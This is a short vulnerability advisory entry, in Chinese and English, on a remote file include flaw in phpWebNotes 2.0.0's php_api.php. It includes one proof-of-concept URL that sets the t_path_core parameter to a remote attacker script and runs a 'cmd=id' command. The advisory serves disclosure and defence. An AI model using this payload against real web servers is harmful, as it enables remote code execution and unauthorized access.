https://www.exploit-db.com/exploits/26201
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-024

phpWebNotes是一个根据php.net建模的页面注释系统。它的主要目的是提供在线帮助/doc/使用说明页面。这些Web文档最经常的用途是让用户增加页脚注释。phpWebNotes2.0.0版本中的php_api.php文件使用析出函数修改关键变量，如$t_path_core，这导致了PHP文件包含漏洞。远程攻击者可利用该漏洞借助于t_path_core参数执行任意的PHP代码。

source: http://www.securityfocus.com/bid/14679/info

phpWebNotes is prone to a remote file include vulnerability.

hpWebNotes is susceptible to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may exploit this issue to execute arbitrary PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/xxxxx/api.php?t_path_core=http://pathtohackingscript?&cmd=id

来源:XF
名称:phpwebnotes-phpapi-file-include(22040)
链接:http://xforce.iss.net/xforce/xfdb/22040
来源:SECTRACK
名称:1014807
链接:http://www.securitytracker.com/alerts/2005/Aug/1014807.html
来源:BID
名称:14679
链接:http://www.securityfocus.com/bid/14679
来源:BUGTRAQ
名称:20050827XSSsecurityholeinphpwebnotes.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112516693300371&w;=2